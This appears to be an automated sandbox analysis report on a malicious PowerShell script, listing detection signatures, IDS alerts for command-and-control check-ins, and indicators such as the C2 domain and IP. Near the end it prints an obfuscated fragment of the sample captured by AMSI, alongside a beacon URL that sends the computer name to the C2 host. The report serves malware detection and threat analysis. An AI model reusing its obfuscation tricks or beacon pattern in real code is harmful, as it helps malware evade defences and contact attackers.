Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1590049
MD5:c7836e39d4ac41c592256e5a3a60ac3a
SHA1:3d6becb61b9d5f6bf265c83a3e1fe88395ab53e4
SHA256:ff335ed48532829555fd93efaa07c65ee2a150cf6971b59da9675f0ad310e158
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64native
  • powershell.exe (PID: 796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5040, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 796, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5040, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 796, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-13T14:42:40.011031+010020577411A Network Trojan was detected192.168.11.204975445.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-13T14:42:40.011031+010018100002Potentially Bad Traffic192.168.11.204975445.61.136.13880TCP
2025-01-13T14:42:40.328923+010018100002Potentially Bad Traffic192.168.11.2049755142.251.167.14780TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: download.ps1Virustotal: Detection: 15%Perma Link
Source: Binary string: .pdbpdblib.pdb source: powershell.exe, 00000000.00000002.35026043241.000001753BE81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.35026043241.000001753BE81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.35026043241.000001753BE81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.35026043241.000001753BE81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WTn.pdb source: powershell.exe, 00000000.00000002.35027610827.000001753BF4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.35026043241.000001753BE81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb| source: powershell.exe, 00000000.00000002.35029076745.000001753C26C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-11D0-891F-00AA004B2E24}\InprocServer32 source: powershell.exe, 00000000.00000002.34952327482.00000175219E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.34952327482.00000175219E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34953626098.0000017523B38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.35027610827.000001753BF4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbh source: powershell.exe, 00000000.00000002.35027610827.000001753BF4A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb source: powershell.exe, 00000000.00000002.35026043241.000001753BE81000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbyer Lin source: powershell.exe, 00000000.00000002.35029076745.000001753C26C000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.20:49754 -> 45.61.136.138:80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49755 -> 142.251.167.147:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49754 -> 45.61.136.138:80
Source: global trafficHTTP traffic detected: GET /ay3cmf8whbhtr.php?id=computer&key=12150337984&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: lggknhaffleahbh.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /ay3cmf8whbhtr.php?id=computer&key=12150337984&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: lggknhaffleahbh.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><span equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: lggknhaffleahbh.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$2p3ixaq4wkv1zjf/$nw32m1jk8b4t7eh.php?id=$env:computername&key=$fswpmlx&s=527
Source: powershell.exe, 00000000.00000002.34953626098.0000017523B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.34953626098.0000017523B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.35025295907.000001753BD10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000000.00000002.34954117551.0000017523E4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lggknhaffleahbh.top
Source: powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://lggknhaffleahbh.top/ay3cmf8whbhtr.php?id=computer&key=12150337984&s=527
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.34954117551.0000017527104000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525E4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.34954117551.0000017525C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.34954117551.0000017523F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXzw
Source: powershell.exe, 00000000.00000002.34954117551.0000017526F92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526FBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525CDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.000001752531B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017523F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FDE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.00000175251E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525324000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525003000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533ECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017524FEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageXzw
Source: powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.34954117551.0000017523CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.34954117551.0000017525C80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.34954117551.0000017525C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.34954117551.0000017523F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzw
Source: powershell.exe, 00000000.00000002.34954117551.0000017526F92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526FBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525CDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017523E6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000000.00000002.34953626098.0000017523B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.34954117551.0000017523CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.34954117551.0000017523F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533ECC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.comXzw
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.35016420016.0000017533D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.35016420016.0000017533D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.35016420016.0000017533D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.35016420016.0000017533F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533ECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017523E6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.34954117551.0000017525C98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.34954117551.0000017523F19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXzw
Source: powershell.exe, 00000000.00000002.34954117551.0000017526F92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017526FBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525CDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525C98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000000.00000002.34954117551.000001752533B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24Xzw
Source: powershell.exe, 00000000.00000002.34954117551.000001752533B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24h
Source: powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24hY
Source: powershell.exe, 00000000.00000002.34954117551.0000017523F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533F5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533D00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533FEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533ECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.000001752533B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96Xzw
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.34954117551.0000017527104000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.34954117551.0000017525E4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533D62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.34953626098.0000017523B45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.34954117551.0000017526AB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.35016420016.0000017533ECC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.34954117551.00000175242A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comXzw
Source: powershell.exe, 00000000.00000002.34954117551.0000017524C90000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9863075510_2_00007FF986307551
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9863083010_2_00007FF986308301
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9862FDE750_2_00007FF9862FDE75
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF9862FDEC80_2_00007FF9862FDEC8
Source: classification engineClassification label: mal72.evad.winPS1@2/8@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edr5xnb5.cij.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $3x0ugn7t59qpbhw.(([system.String]::new(@((-3498+(462+(-2674+(4398+(2158135/(-8662+10227)))))),(1090908/(6722352/(3387168/4952))),(6548-6436),(11011/91),(7140/85),(9388-(14033-4756))))))( $fua1mp9csw5x7v3 ) $3x0ugn7t59qpbhw.(([char[]]@((-5925+5992),(715716/6627),(447774/(19637512/(9504-(11419-(56821191/(-1855+10232)))))),(1114465/(15031-(2312+(10854-(14496-(15189-(10811-2292))))))),(223-122)) -join ''))()$1pgi8qmr2h7we0f.((-join (@((324-257),(5529-(12850-7429)),(1020312/9192),(1984-(7747-5878)),(696395/(-2343+9238)))| ForEach-Object { [char]$_ })))()[byte[]] $hmkr9jg6a2y0sco = $fua1mp9csw5x7v3.(([system.String]::new(@((-4803+4887),(95793/863),(5058-4993),(1002516/(6655+(10193-(10408-(-2277+(27906406/(36415118/(40699605/(8269-(8415-6881)))))))))),(235296/(7495-(5237+(-8820+(91374918/10137))))),(1666-(9624-(15321-7266))),(9402-9281)))))() $qy14vcih073m8fd=$hmkr9jg6a2y0sco return $qy14vcih073m8fd}[System.Text.Encoding]::ascii.(([system.String]::new(@((1474-1403),(-5316+(14173-(75669352/8642))),(721752/(10107-(6696-(-2527+(3864+(-1556+3030)))))),(810412/9764),(297308/2563),(671802/5893),(295-(918460/4834)),(956230/8693),(-6738+6841)))))((seqm74wbtg3nfzdhlav6oi8kjcp 